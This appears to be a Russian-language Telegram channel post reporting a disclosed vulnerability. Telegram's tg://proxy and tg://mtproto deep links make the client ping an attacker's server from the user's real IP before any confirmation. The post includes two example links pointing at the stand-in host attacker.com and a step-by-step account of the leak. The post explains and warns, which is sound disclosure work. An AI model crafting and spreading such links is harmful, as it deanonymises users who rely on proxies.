3.6Kпросмотров
50.1%от подписчиков
13 января 2026 г.
📷 ФотоScore: 3.9K
💬 Уязвимость в Telegram позволяет узнать ваш реальный IP Речь идёт о деанонимизации на сетевом уровне, которая срабатывает мгновенно — ещё до любого действия пользователя.
10 января 2026 года исследователи GangExposed RU и 0x6rss опубликовали разбор уязвимости в официальных клиентах Telegram для Android и iOS. Проблема связана с deep link-ссылками формата tg://proxy и tg://mtproto. Пример таких ссылок: tg://proxy?server=attacker.com&port=1234&secret=1234567890abcdef или tg://mtproto?server=attacker.com&port=1234&secret=secret Подобную ссылку легко замаскировать под кнопку «Подключить быстрый прокси» или спрятать в обычном тексте канала. Пользователь кликает, ожидая окно настроек — и оно действительно появляется. Но есть нюанс. Перед показом окна Telegram автоматически проверяет доступность прокси. Для этого клиент отправляет диагностический запрос напрямую на указанный сервер. Запрос уходит с реального IP-адреса устройства — даже если у пользователя уже включён другой прокси и он уверен, что весь трафик давно «завёрнут». Как это выглядит на практике: 🟪 Пользователь нажимает tg://proxy
🟪 Telegram показывает «Connecting…» / «Проверка соединения»
🟪 В этот момент запрос напрямую уходит на attacker.com
🟪Сервер злоумышленника фиксирует IP и время
🟪 Пользователь видит кнопку «Включить»
🟪 Утечка уже произошла Исследователь сравнил эту механику с NTLM-relay атаками в Windows, когда система автоматически раскрывает чувствительные данные ещё до того, как пользователь осознаёт происходящее. Telegram прокомментировал ситуацию.
Компания признала такое поведение клиента, заявив, что «любой сайт видит ваш IP при переходе». MTProxy существует с 2016 года. Если логика проверки не менялась, эта «слепая зона» могла существовать годами. Встроенные прокси Telegram — это инструмент обхода блокировок, а не средство анонимности. А ссылки tg://proxy и tg://mtproto разумнее воспринимать как потенциальные трекеры. 👉 @geekhackers